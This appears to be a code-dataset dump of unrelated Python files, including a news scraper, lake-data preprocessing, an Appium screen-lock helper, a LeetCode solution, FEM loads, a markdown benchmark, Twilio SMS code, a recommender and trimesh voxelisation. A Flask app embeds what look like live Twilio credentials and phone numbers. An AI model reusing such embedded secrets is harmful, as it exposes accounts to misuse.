print('文章字数不足', max_text)\n\n\ndef main(search_word, max_art, max_text, s_date):\n '''\n 铅笔道爬虫入口函数\n :param search_word:搜索关键词\n :return: None\n '''\n page = 1\n url2_list = []\n while page:\n one_page_url, pages = handle(search_word=search_word, page=page, s_date=s_date)\n url2_list += one_page_url\n if len(url2_list) < max_art and page < int(pages):\n page += 1\n else:\n page = 0\n url2_list = url2_list[:5] if config.DEBUG else url2_list\n for url2 in url2_list:\n get_data(url=url2, search_word=search_word, max_text=max_text)\n\n\nif __name__ == '__main__':\n p0 = '人工智能'\n p1 = 10\n p2 = 500\n p3 = '2018-01-01'\n r2 = main(search_word=p0, max_art=p1, max_text=p2, s_date=p3)\n","sub_path":"Backend/scrapers/news/temp/bailuzhiku.py","file_name":"bailuzhiku.py","file_ext":"py","file_size_in_byte":6048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"337958217","text":"import os.path\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nimport getopt\nimport math\nfrom pandas import DataFrame\nsys.path.append('../../data')\nsys.path.append('../../../data')\nsys.path.append('/home/invyz/workspace/Research/lake_monitoring/src/data')\n\nfrom rw_data import readMatData, saveMatData\n\n#######################################################\n# UNFINISHED - preprocess for observed data experiments\n###########################################################\n\ndata_fpath = \"../../../data/processed/mendota.mat\"\ndata_samp_fpath = \"../../../data/processed/mendota_sampled.mat\"\n#parse command line arguments\ndef main(argv):\n seq_length = ''\n try:\n opts, args = getopt.getopt(argv,\"hl:\",[\"sLength=\"])\n except getopt.GetoptError:\n print('usage: RNN_proprocess.py -l ')\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n print('RNN_proprocess.py -l ')\n sys.exit()\n elif opt in (\"-l\", \"--seq_length\"):\n seq_length = arg\n print ('sequence length is ', seq_length)\n\nseq_length = -1\nmain(sys.argv[1:])\nif(len(sys.argv[1:]) == 2):\n\tseq_length = int(sys.argv[2])\nelse:\n\tprint(\"ERROR, usage: RNN_proprocess.py -l \")\n\n\n#load data\nmat = readMatData(os.path.abspath(data_fpath))\nmat_s = readMatData(os.path.abspath(data_samp_fpath))\n\n\nx = mat_s['Xc_doy'][:,0:11]\ny = mat['Observed_temp']\n\n\nstd_depth_values = np.array(np.sort(list(set(mat['Xc_doy'][:,2].flat))))\n\nn_depths = len(set(mat_s['Depth'].flat))\nu_depth_values = np.array(np.sort(list(set(mat_s['Depth'].flat))))\ndepths_s = mat_s['Depth']\ndepths = mat['Depth']\nudates = np.array(np.sort(list(set(mat_s['datenums'].flat))))\nnum_u_dates = np.shape(udates)[0]\ndatenums = mat['datenum']\ndatenums_s = mat_s['datenums']\nn = np.shape(x)[0]\nn_s = np.shape(y)[0]\n###########################################3\n#create matrix that maps (depth, time) pair to modeled temp\n###############################\n\n\n#TODO generalize these parameters\n\n#parameters\nseq_per_depth = math.floor(n / seq_length)\nn_features = 11 #hardcoded for now, maybe not in the future?\nn_seq = seq_per_depth * n_depths\nn_ignore_dates = n - seq_per_depth*seq_length\nprint(n_ignore_dates)\n\n\n\n\nseq_mat_feat = np.empty(shape=(n_depths, num_u_dates, n_features))\nseq_mat_label = np.zeros(shape=(n_depths, num_u_dates, 1))\n#ignore remainder dates\n\nignore_dates = udates[-n_ignore_dates:]\n\n#fill feature matrix, with depth as rows and dates as columns\nfor i in range(0,n):\n\tif(i % 50000 == 0):\n\t\tprint(i, \" data processed\")\n\tif mat_s['datenums'][i] in ignore_dates:\n\t\t#skip over ignored dates\n\t\tcontinue\n\telse:\n\t\t#get depth and datenum indices for matrix\n\t\tdepth_ind = np.where(u_depth_values == depths_s[i])[0]\n\t\tdatenum_ind = np.where(udates == datenums_s[i])[0]\n\n\t\t#place data\n\t\tseq_mat_feat[depth_ind,datenum_ind,:] = x[i,:]\n\n\t\t# #find y that matches\n\t\t# seq_mat_label[depth_ind,datenum_ind,0] = y[i]\n\nnotAdded = 0\n\nfor i in range(0,n_s):\n\t#fill sample labels from observed data\n\tif mat['datenum'][i] in ignore_dates:\n\t\tcontinue\n\telse:\n\t\tdepth_ind = np.where(u_depth_values == depths[i])[0]\n\t\tdate_ind = np.where(udates == datenums[i])[0]\n\n\t\tif(depth_ind.size == 0 or date_ind.size == 0):\n\t\t\tprint(\"depth \", depths[i], \" not in sampled dataset\",\n\t\t\t\t \" or \", datenums[i], \" not in it\")\n\t\t\tnotAdded += 1\n\n\t\telse:\n\t\t\tseq_mat_label[depth_ind, date_ind, 0] = y[i]\n\nprint(\"labels used \", np.count_nonzero(seq_mat_label))\nprint(\"labels not used \", notAdded)\n\n#removes depths with not many labels\n# depth_observation_cutoff = 35\n# depth_rm_ind = []\n# for d in range(0,n_depths):\n# \tif np.count_nonzero(seq_mat_label[d,:]) < depth_observation_cutoff:\n# \t\tdepth_rm_ind.append(d)\n# \t#print(\"depth \", d, \": \", np.count_nonzero(seq_mat_label[d,:]))\n\n# seq_mat_feat = np.delete(seq_mat_feat, depth_rm_ind, axis=0)\n# seq_mat_label = np.delete(seq_mat_label, depth_rm_ind, axis=0)\n\n\nmat['Depth_Time_Series_Features'] = seq_mat_feat\nmat['Depth_Time_Series_Labels'] = seq_mat_label\nsaveMatData(mat, os.path.abspath(data_fpath))\n\n\n","sub_path":"src/scripts/one-off/RNN_preprocess_obs.py","file_name":"RNN_preprocess_obs.py","file_ext":"py","file_size_in_byte":4040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"281981777","text":"from appium.webdriver.common.touch_action import TouchAction\nfrom Base.base import Base\nimport Data\nfrom Base.get_driver import GetDriver\nfrom time import sleep\nclass PageUnlock(Base):\n def __init__(self,driver):\n self.driver=driver\n\n #进入设置,向上滑动,使得页面显示“安全”\n def page_scorll_safety(self):\n self.base_scroll(Data.unlock_storage,Data.unlock_WLAN)\n\n #点击安全\n def page_click_safety(self):\n elements=self.base_find_elements(Data.unlock_safety)\n for element in elements:\n if \"安全\" in element.text:\n element.click()\n break\n #点击锁屏锁定方式\n def page_click_lock_screen_way(self):\n self.base_click_element(Data.unlock_lock_screen_way)\n\n #点击图案\n def page_click_icon(self):\n self.base_click_element(Data.unlock_lock_icon)\n\n #设置图案,1(90,320) 2(270,320) 3(450,320) 4(450,500)\n def page_press_move_to(self):\n TouchAction(self.driver).press(x=90,y=320).wait(2000).move_to(x=270,y=320).release().perform()\n\n\nif __name__ == '__main__':\n d=GetDriver().get_driver()\n p=PageUnlock(d)\n p.page_scorll_safety()\n sleep(2)\n p.page_click_safety()\n sleep(2)\n p.page_click_lock_screen_way()\n p.page_click_icon()\n p.page_press_move_to()","sub_path":"Page/page_unlock.py","file_name":"page_unlock.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"337914027","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def leafSimilar(self, root1, root2):\n \"\"\"\n :type root1: TreeNode\n :type root2: TreeNode\n :rtype: bool\n \"\"\"\n leaf1 = []\n leaf2 = []\n\n def dfs(root, leaf):\n tree = [root]\n while tree:\n node = tree.pop()\n if not node:\n continue\n tree.append(node.left)\n tree.append(node.right)\n if not node.left and not node.right:\n leaf.append(node.val)\n\n dfs(root1, leaf1)\n dfs(root2, leaf2)\n return leaf1 == leaf2\n","sub_path":"872 Leaf-Similar Trees.py","file_name":"872 Leaf-Similar Trees.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"256114844","text":"class MassLoad:\n \n def __init__(self, magnitude=None, DOF=None):\n self.magnitude = magnitude\n self.DOF = DOF\n \n\n\nclass NodalLoad:\n \n def __init__(self, magnitude=None, node=None, DOF=None):\n self.magnitude = magnitude\n self.node = node\n self.DOF = DOF\n\n\nclass TimeDependentLoad(NodalLoad):\n \n def __init__(self, time_history=None, *args, **kwargs):\n super().__init__(*args, **kwargs)\n if self.magnitude is None:\n self.magnitude = 1\n self._history = self.magnitude * time_history\n self.total_steps = len(time_history)\n \n def time_history(self, timestep):\n if timestep < self.total_steps:\n return self._history[timestep]\n else:\n return 0\n\nclass InertiaLoad(MassLoad):\n \n def __init__(self, time_history=None, *args, **kwargs):\n super().__init__(*args, **kwargs)\n if self.magnitude is None:\n self.magnitude = 1\n self._history = self.magnitude * time_history\n self.total_steps = time_history.shape[0]\n \n def time_history(self, timestep, direction_vector, out):\n if timestep < self.total_steps:\n out += self._history[timestep] * direction_vector\n else:\n pass\n \n \n \n \n ","sub_path":"fem/core/loads.py","file_name":"loads.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"18492472","text":"import argparse\nfrom importlib import import_module\nimport os\nimport re\nfrom time import perf_counter\n\nALL_PACKAGES = (\n \"python-markdown:extra\",\n \"mistune\",\n \"commonmark.py\",\n \"mistletoe\",\n \"myst_parser:html\",\n \"myst_parser:docutils\",\n \"myst_parser:sphinx\",\n)\n\n\ndef benchmark(package_name, version=None):\n def decorator(func):\n def inner(text, num_parses):\n try:\n package = import_module(package_name)\n print(\"(\" + (version or package.__version__) + \")\", end=\": \")\n except ImportError:\n return \"not available.\"\n start = perf_counter()\n for i in range(num_parses):\n func(package, text)\n end = perf_counter()\n\n return end - start\n\n return inner\n\n return decorator\n\n\n@benchmark(\"markdown\")\ndef run_python_markdown_extra(package, text):\n return package.markdown(text, extensions=[\"extra\"])\n\n\n@benchmark(\"mistune\")\ndef run_mistune(package, text):\n return package.markdown(text)\n\n\n@benchmark(\"commonmark\", \"0.9.1\")\ndef run_commonmark_py(package, text):\n return package.commonmark(text)\n\n\n@benchmark(\"mistletoe\")\ndef run_mistletoe(package, text):\n return package.markdown(text)\n\n\n@benchmark(\"myst_parser\")\ndef run_myst_parser_html(package, text):\n package.parse_text(text, \"html\")\n\n\n@benchmark(\"myst_parser\")\ndef run_myst_parser_docutils(package, text):\n package.parse_text(text, \"docutils\", config={\"ignore_missing_refs\": True})\n\n\n@benchmark(\"myst_parser\")\ndef run_myst_parser_sphinx(package, text):\n package.parse_text(text, \"sphinx\", load_sphinx_env=True)\n\n\ndef run_all(package_names, text, num_parses):\n prompt = \"Running {} test(s) ...\".format(len(package_names))\n print(prompt)\n print(\"=\" * len(prompt))\n for package_name in package_names:\n print(package_name, end=\" \")\n func_name = re.sub(r\"[\\.\\-\\:]\", \"_\", package_name.lower())\n print(\n \"{:.2f} s\".format(globals()[\"run_{}\".format(func_name)](text, num_parses))\n )\n return True\n\n\ndef main(args=None):\n parser = argparse.ArgumentParser(description=\"Run benchmark test.\")\n parser.add_argument(\"path\", type=str, help=\"the path to the file to parse\")\n parser.add_argument(\n \"-n\",\n \"--num-parses\",\n metavar=\"NPARSES\",\n default=1000,\n type=int,\n help=\"The number of parse iterations (default: 1000)\",\n )\n parser.add_argument(\n \"-p\",\n \"--package\",\n action=\"append\",\n default=[],\n help=\"The package(s) to run (use -p multiple times).\",\n choices=ALL_PACKAGES,\n metavar=\"PACKAGE_NAME\",\n )\n args = parser.parse_args(args)\n\n assert os.path.exists(args.path), \"path does not exist\"\n print(\"Test document: {}\".format(os.path.basename(args.path)))\n print(\"Test iterations: {}\".format(args.num_parses))\n with open(args.path, \"r\") as handle:\n text = handle.read()\n return run_all(args.package or ALL_PACKAGES, text, args.num_parses)\n","sub_path":"myst_parser/cli/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":3044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"14552417","text":"from twilio.rest import Client\nfrom keys import key\n\nclass Messenger():\n def __init__(self):\n self.account_sid = key.api_keys['TWILIO_SID']\n self.auth_token = key.api_keys['TWILIO_TOKEN']\n self.client = Client(self.account_sid, self.auth_token)\n self.body = None\n\n def send_sms(self):\n message = self.client.api.messages.create(\n to=\"+18609667758\",\n body=self.body,\n from_=\"+18603563068\"\n )\n\n\n","sub_path":"modules/sms.py","file_name":"sms.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"160536227","text":"import pyaudio\nimport time\nimport numpy as np\n\nWIDTH = 2\nCHANNELS = 1\nRATE = 44100\n\ndef main():\n pa = pyaudio.PyAudio()\n\n # fd = open('data/test.dat', 'wb')\n\n def callback(in_data, frame_count, time_info, status):\n # print(np.frombuffer(in_data, dtype=np.int16))\n # fd.write(in_data)\n # print(frame_count)\n return (in_data, pyaudio.paContinue)\n\n format = pa.get_format_from_width(WIDTH)\n\n stream = pa.open(\n format = format,\n channels = CHANNELS,\n rate = RATE,\n input = True,\n output = True,\n stream_callback = callback,\n frames_per_buffer=256,\n )\n\n stream.start_stream()\n\n while stream.is_active():\n time.sleep(0.0025)\n\n stream.stop_stream()\n stream.close()\n\n pa.terminate()\n\nif __name__ == '__main__':\n main()\n","sub_path":"examples/002_wire.py","file_name":"002_wire.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"149724139","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 4 23:18:40 2018\n\n@author: braulinho\n\"\"\"\nfrom pymongo import MongoClient\n\ndef simsMatrix(correo):\n try:\n client = MongoClient('localhost',27017)\n #database reference \n db = client.Itinerario\n \n #referencias\n historial = db.history\n \n #obtengo datos\n mongo = historial.find({},projection={'_id':0.0, 'lugar':1.0, 'visitantes':1.0})\n lugares=[]\n usuarios=[]\n for registro in mongo:\n lugares.append(str(registro['lugar']))\n usuarios.append(registro['visitantes'])\n \n #datos \n simsMatrix={}\n for i, lui in enumerate(lugares):\n jaccard=[]\n for j, luj in enumerate(lugares):\n jaccard.append(len(set(usuarios[i]).intersection(usuarios[j]))/\n len(set(usuarios[i]).union(usuarios[j])))\n simsMatrix[lui]=jaccard \n \n #obtengo lugares que ha visitado el usuario\n index=[]\n for i in enumerate(usuarios):\n if correo in i[1]:\n index.append([lugares[i[0]],simsMatrix[lugares[i[0]]],i[0]])\n\n #recomiendo arriba de 80% si es que lo hay segun lo que visito\n result=[]\n for vis in index:\n #obj={}\n #l=[]\n for i,el in enumerate(vis[1]):\n if (i != vis[2]) and (el > 0.79):\n if lugares[i] not in result:\n result.append(lugares[i])\n #obj[vis[0]]=l\n #result.append(obj)\n print (result)\n except:\n print([])\n finally:\n client.close()\n \nif __name__ == \"__main__\":\n import sys\n simsMatrix(sys.argv[1])","sub_path":"scripts/RecSys.py","file_name":"RecSys.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"483924238","text":"import os\nfrom twilio.rest import Client\nfrom flask import Flask, redirect, url_for, render_template, request\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\", content=\"Testing\")\n \n@app.route(\"/sms\", methods=[\"POST\", \"GET\"])\ndef sms():\n if request.method == \"POST\":\n\n tonum = request.form[\"smsnum\"]\n tobody = str(request.form[\"smsbody\"])\n account_sid = 'AC46648a764504d96ef5f6ff9d7c493117'\n auth_token = '11eb94b229fa1348c2ce5fe730254d4c'\n client = Client(account_sid, auth_token)\n\n message = client.messages \\\n .create(\n body=tobody,\n from_='+19035002648',\n to=tonum\n )\n\n print(message.sid)\n print(message.body)\n return(\"sms sent\")\n else:\n return render_template(\"sms.html\")\n\n@app.route(\"/\")\ndef user(usr):\n return f\"

{usr}

\"\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"139993788","text":"from functools import wraps\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render_to_response\nfrom django.contrib.auth.models import User, Group\n\ndef check_user(func):\n \n def wrapped(request):\n try:user = User.objects.get(username = func['username'])\n except:\n try:user = request.user\n except:user = []\n try:\n user_group = user.groups.all()\n vendor_group = Group.objects.get(name = 'Vendor Group')\n except:\n user_group = []\n vendor_group = None\n response = HttpResponseRedirect('/vcms_app/login_page/')\n if user:\n if vendor_group in user_group or user.is_staff:\n return func(request)\n else:\n if not user.is_anonymous():\n response.set_cookie('error_message', 'user not belong to vendor group', 5)\n return response\n else:\n return response\n else:\n response.set_cookie('error_message', 'Enter valid username and password', 3)\n return response\n return wrapped","sub_path":"zlpbyyrtrsbez/vcms/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"473490052","text":"import pandas as pd\nimport numpy as np\nfrom pathlib import Path\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\n\nclass PaperRecommandation(object):\n KEY_COLUMN = \"keyword1\"\n SIMILARITY_THRESHOLD = 0.1\n OUTPUT_COLUMNS = [(\"title\", \"title\"), (\"authors_parsed\", \"author\"), (\"update_date\", \"date\"), (\"id\", \"url\")]\n\n def __init__(self, paper_data_folder):\n # print(paper_data_folder)\n self.paper_dfs = []\n folder = Path(paper_data_folder)\n for csv_file in folder.glob(\"*.csv\"):\n # print(\"read from\", csv_file)\n df = pd.read_csv(str(csv_file)).fillna(\"\")\n df = df.rename(columns={a: b for a, b in self.OUTPUT_COLUMNS})\n # for col1, col2 in self.OUTPUT_COLUMNS:\n # df[col2] = df[col1]\n select_columns = [a[1] for a in self.OUTPUT_COLUMNS] + [self.KEY_COLUMN, ]\n\n df = df[select_columns]\n df[\"url\"] = df[\"url\"].apply(lambda x: f\"https://arxiv.org/abs/{x}\")\n # print(df[\"url\"].head())\n cv = CountVectorizer()\n count_vectors = cv.fit_transform(df[self.KEY_COLUMN])\n test_vect = cv.transform([\"speech\"])\n self.paper_dfs.append([df, cv, count_vectors, test_vect])\n\n def contentBasedRecommand(self, keyword, max_count=10):\n results = []\n for df, cv, vectors, test_vect in self.paper_dfs:\n\n keyword_vector = cv.transform([keyword])\n\n cosine_sim = cosine_similarity(vectors, keyword_vector)\n index = np.argsort(cosine_sim.reshape(-1))[::-1]\n\n idx, _ = np.where(cosine_sim > self.SIMILARITY_THRESHOLD)\n\n count = min(max_count, len(idx))\n result_df = df.loc[index[:count], [a[1] for a in self.OUTPUT_COLUMNS]]\n result_df = result_df.applymap(lambda x: x if not isinstance(x, str) else x.replace(\"\\n\", \"\"))\n\n results.append(result_df)\n\n if len(results) > 1:\n return pd.concat(results)\n else:\n return results[0]\n\n\n\n\n","sub_path":"SystemCode/frontend/kieFrontApp/paper_recommand_py/recommandation.py","file_name":"recommandation.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"86388367","text":"\"\"\"\nvoxel.py\n-----------\n\nConvert meshes to a simple voxel data structure and back again.\n\"\"\"\nimport numpy as np\n\nfrom . import util\nfrom . import remesh\nfrom . import caching\nfrom . import grouping\n\nfrom .constants import log, log_time\n\n\nclass VoxelBase(object):\n\n def __init__(self, *args, **kwargs):\n self._data = caching.DataStore()\n self._cache = caching.Cache(id_function=self._data.crc)\n\n @caching.cache_decorator\n def marching_cubes(self):\n \"\"\"\n A marching cubes Trimesh representation of the voxels.\n\n No effort was made to clean or smooth the result in any way;\n it is merely the result of applying the scikit-image\n measure.marching_cubes function to self.matrix.\n\n Returns\n ---------\n meshed: Trimesh object representing the current voxel\n object, as returned by marching cubes algorithm.\n \"\"\"\n meshed = matrix_to_marching_cubes(matrix=self.matrix,\n pitch=self.pitch,\n origin=self.origin)\n return meshed\n\n @property\n def pitch(self):\n # stored as TrackedArray with a single element\n return self._data['pitch'][0]\n\n @pitch.setter\n def pitch(self, value):\n self._data['pitch'] = value\n\n @property\n def shape(self):\n \"\"\"\n The shape of the matrix for the current voxel object.\n\n Returns\n ---------\n shape: (3,) int, what is the shape of the 3D matrix\n for these voxels\n \"\"\"\n return self.matrix.shape\n\n @caching.cache_decorator\n def filled_count(self):\n \"\"\"\n Return the number of voxels that are occupied.\n\n Returns\n --------\n filled: int, number of voxels that are occupied\n \"\"\"\n return int(self.matrix.sum())\n\n @caching.cache_decorator\n def volume(self):\n \"\"\"\n What is the volume of the filled cells in the current voxel object.\n\n Returns\n ---------\n volume: float, volume of filled cells\n \"\"\"\n volume = self.filled_count * (self.pitch**3)\n return volume\n\n @caching.cache_decorator\n def points(self):\n \"\"\"\n The center of each filled cell as a list of points.\n\n Returns\n ----------\n points: (self.filled, 3) float, list of points\n \"\"\"\n points = matrix_to_points(matrix=self.matrix,\n pitch=self.pitch,\n origin=self.origin)\n return points\n\n def point_to_index(self, point):\n \"\"\"\n Convert a point to an index in the matrix array.\n\n Parameters\n ----------\n point: (3,) float, point in space\n\n Returns\n ---------\n index: (3,) int tuple, index in self.matrix\n \"\"\"\n indices = points_to_indices(points=[point],\n pitch=self.pitch,\n origin=self.origin)\n index = tuple(indices[0])\n return index\n\n def is_filled(self, point):\n \"\"\"\n Query a point to see if the voxel cell it lies in is filled or not.\n\n Parameters\n ----------\n point: (3,) float, point in space\n\n Returns\n ---------\n is_filled: bool, is cell occupied or not\n \"\"\"\n index = self.point_to_index(point)\n in_range = (np.array(index) < np.array(self.shape)).all()\n if in_range:\n is_filled = self.matrix[index]\n else:\n is_filled = False\n return is_filled\n\n\nclass Voxel(VoxelBase):\n\n def __init__(self, matrix, pitch, origin):\n super(Voxel, self).__init__()\n\n self._data['matrix'] = matrix\n self._data['pitch'] = pitch\n self._data['origin'] = origin\n\n @property\n def origin(self):\n return self._data['origin']\n\n @property\n def matrix(self):\n return self._data['matrix']\n\n def as_boxes(self):\n \"\"\"\n A rough Trimesh representation of the voxels with a box\n for each filled voxel.\n\n Returns\n ---------\n mesh: Trimesh object made up of one box per filled cell.\n \"\"\"\n centers = matrix_to_points(\n matrix=self._data['matrix'],\n pitch=self._data['pitch'],\n origin=self._data['origin'],\n )\n mesh = multibox(centers=centers, pitch=self.pitch)\n return mesh\n\n def show(self, *args, **kwargs):\n \"\"\"\n Convert the current set of voxels into a trimesh for visualization\n and show that via its built- in preview method.\n \"\"\"\n return self.as_boxes().show(*args, **kwargs)\n\n\nclass VoxelMesh(VoxelBase):\n\n def __init__(self,\n mesh,\n pitch,\n max_iter=10,\n size_max=None,\n method='subdivide'):\n \"\"\"\n A voxel representation of a mesh that will track changes to\n the mesh.\n\n At the moment the voxels are not filled in and only represent\n the surface.\n\n Parameters\n ----------\n mesh: Trimesh object\n pitch: float, how long should each edge of the voxel be\n size_max: float, maximum size (in mb) of a data structure that\n may be created before raising an exception\n \"\"\"\n super(VoxelMesh, self).__init__()\n\n self._method = method\n self._data['mesh'] = mesh\n self._data['pitch'] = pitch\n self._data['max_iter'] = max_iter\n\n @caching.cache_decorator\n def matrix_surface(self):\n \"\"\"\n The voxels on the surface of the mesh as a 3D matrix.\n\n Returns\n ---------\n matrix: self.shape np.bool, if a cell is True it is occupied\n \"\"\"\n matrix = sparse_to_matrix(self.sparse_surface)\n return matrix\n\n @caching.cache_decorator\n def matrix_solid(self):\n \"\"\"\n The voxels in a mesh as a 3D matrix.\n\n Returns\n ---------\n matrix: self.shape np.bool, if a cell is True it is occupied\n \"\"\"\n matrix = sparse_to_matrix(self.sparse_solid)\n return matrix\n\n @property\n def matrix(self):\n \"\"\"\n A matrix representation of the surface voxels.\n\n In the future this is planned to return a filled voxel matrix\n if the source mesh is watertight, and a surface voxelization\n otherwise.\n\n Returns\n ---------\n matrix: self.shape np.bool, cell occupancy\n \"\"\"\n if self._data['mesh'].is_watertight:\n return self.matrix_solid\n return self.matrix_surface\n\n @property\n def origin(self):\n \"\"\"\n The origin of the voxel array.\n\n Returns\n ------------\n origin: (3,) float, point in space\n \"\"\"\n populate = self.sparse_surface\n return self._cache['origin']\n\n @caching.cache_decorator\n def sparse_surface(self):\n \"\"\"\n Filled cells on the surface of the mesh.\n\n Returns\n ----------------\n voxels: (n, 3) int, filled cells on mesh surface\n \"\"\"\n if self._method == 'ray':\n func = voxelize_ray\n elif self._method == 'subdivide':\n func = voxelize_subdivide\n else:\n raise ValueError('voxelization method incorrect')\n\n voxels, origin = func(\n mesh=self._data['mesh'],\n pitch=self._data['pitch'],\n max_iter=self._data['max_iter'][0])\n self._cache['origin'] = origin\n\n return voxels\n\n @caching.cache_decorator\n def sparse_solid(self):\n \"\"\"\n Filled cells inside and on the surface of mesh\n\n Returns\n ----------------\n filled: (n, 3) int, filled cells in or on mesh.\n \"\"\"\n filled = fill_voxelization(self.sparse_surface)\n return filled+0.5\n\n def as_boxes(self, solid=False):\n \"\"\"\n A rough Trimesh representation of the voxels with a box\n for each filled voxel.\n\n Parameters\n -----------\n solid: bool, if True return boxes for sparse_solid\n\n Returns\n ---------\n mesh: Trimesh object made up of one box per filled cell.\n \"\"\"\n if solid:\n filled = self.sparse_solid\n else:\n filled = self.sparse_surface\n # center points of voxels\n centers = indices_to_points(indices=filled,\n pitch=self.pitch,\n origin=self.origin)\n mesh = multibox(centers=centers, pitch=self.pitch)\n return mesh\n\n def show(self, solid=False):\n \"\"\"\n Convert the current set of voxels into a trimesh for visualization\n and show that via its built- in preview method.\n \"\"\"\n self.as_boxes(solid=solid).show()\n\n\n@log_time\ndef voxelize_subdivide(mesh,\n pitch,\n max_iter=10,\n edge_factor=2.0):\n \"\"\"\n Voxelize a surface by subdividing a mesh until every edge is\n shorter than: (pitch / edge_factor)\n\n Parameters\n -----------\n mesh: Trimesh object\n pitch: float, side length of a single voxel cube\n max_iter: int, cap maximum subdivisions or None for no limit.\n edge_factor: float,\n\n Returns\n -----------\n voxels_sparse: (n,3) int, (m,n,p) indexes of filled cells\n origin_position: (3,) float, position of the voxel\n grid origin in space\n \"\"\"\n max_edge = pitch / edge_factor\n\n if max_iter is None:\n longest_edge = np.linalg.norm(mesh.vertices[mesh.edges[:, 0]] -\n mesh.vertices[mesh.edges[:, 1]],\n axis=1).max()\n max_iter = max(int(np.ceil(np.log2(longest_edge / max_edge))), 0)\n\n # get the same mesh sudivided so every edge is shorter\n # than a factor of our pitch\n v, f = remesh.subdivide_to_size(mesh.vertices,\n mesh.faces,\n max_edge=max_edge,\n max_iter=max_iter)\n\n # convert the vertices to their voxel grid position\n hit = v / pitch\n\n # Provided edge_factor > 1 and max_iter is large enough, this is\n # sufficient to preserve 6-connectivity at the level of voxels.\n hit = np.round(hit).astype(int)\n\n # remove duplicates\n unique, inverse = grouping.unique_rows(hit)\n\n # get the voxel centers in model space\n occupied_index = hit[unique]\n\n origin_index = occupied_index.min(axis=0)\n origin_position = origin_index * pitch\n\n voxels_sparse = (occupied_index - origin_index)\n\n return voxels_sparse, origin_position\n\n\ndef local_voxelize(mesh, point, pitch, radius, fill=True, **kwargs):\n \"\"\"\n Voxelize a mesh in the region of a cube around a point. When fill=True,\n uses proximity.contains to fill the resulting voxels so may be meaningless\n for non-watertight meshes. Useful to reduce memory cost for small values of\n pitch as opposed to global voxelization.\n\n Parameters\n -----------\n mesh : trimesh.Trimesh\n Source geometry\n point : (3, ) float\n Point in space to voxelize around\n pitch : float\n Side length of a single voxel cube\n radius : int\n Number of voxel cubes to return in each direction.\n kwargs : parameters to pass to voxelize_subdivide\n\n Returns\n -----------\n voxels : (m, m, m) bool\n Array of local voxels where m=2*radius+1\n origin_position : (3,) float\n Position of the voxel grid origin in space\n \"\"\"\n from scipy import ndimage\n\n # make sure point is correct type/shape\n point = np.asanyarray(point, dtype=np.float64).reshape(3)\n # this is a gotcha- radius sounds a lot like it should be in\n # float model space, not int voxel space so check\n if not isinstance(radius, int):\n raise ValueError('radius needs to be an integer number of cubes!')\n\n # Bounds of region\n bounds = np.concatenate((point - (radius + 0.5) * pitch,\n point + (radius + 0.5) * pitch))\n\n # faces that intersect axis aligned bounding box\n faces = list(mesh.triangles_tree.intersection(bounds))\n\n # didn't hit anything so exit\n if len(faces) == 0:\n return np.array([], dtype=np.bool), np.zeros(3)\n\n local = mesh.submesh([[f] for f in faces], append=True)\n\n # Translate mesh so point is at 0,0,0\n local.apply_translation(-point)\n\n sparse, origin = voxelize_subdivide(local, pitch, **kwargs)\n matrix = sparse_to_matrix(sparse)\n\n # Find voxel index for point\n center = np.round(-origin / pitch).astype(np.int64)\n\n # pad matrix if necessary\n prepad = np.maximum(radius - center, 0)\n postpad = np.maximum(center + radius + 1 - matrix.shape, 0)\n\n matrix = np.pad(matrix, np.stack((prepad, postpad), axis=-1),\n mode='constant')\n center += prepad\n\n # Extract voxels within the bounding box\n voxels = matrix[center[0] - radius:center[0] + radius + 1,\n center[1] - radius:center[1] + radius + 1,\n center[2] - radius:center[2] + radius + 1]\n local_origin = point - radius * pitch # origin of local voxels\n\n # Fill internal regions\n if fill:\n regions, n = ndimage.measurements.label(~voxels)\n distance = ndimage.morphology.distance_transform_cdt(~voxels)\n representatives = [np.unravel_index((distance * (regions == i)).argmax(),\n distance.shape) for i in range(1, n + 1)]\n contains = mesh.contains(\n np.asarray(representatives) *\n pitch +\n local_origin)\n\n where = np.where(contains)[0] + 1\n # use in1d vs isin for older numpy versions\n internal = np.in1d(regions.flatten(), where).reshape(regions.shape)\n\n voxels = np.logical_or(voxels, internal)\n\n return voxels, local_origin\n\n\n@log_time\ndef voxelize_ray(mesh,\n pitch,\n per_cell=[2, 2],\n **kwargs):\n 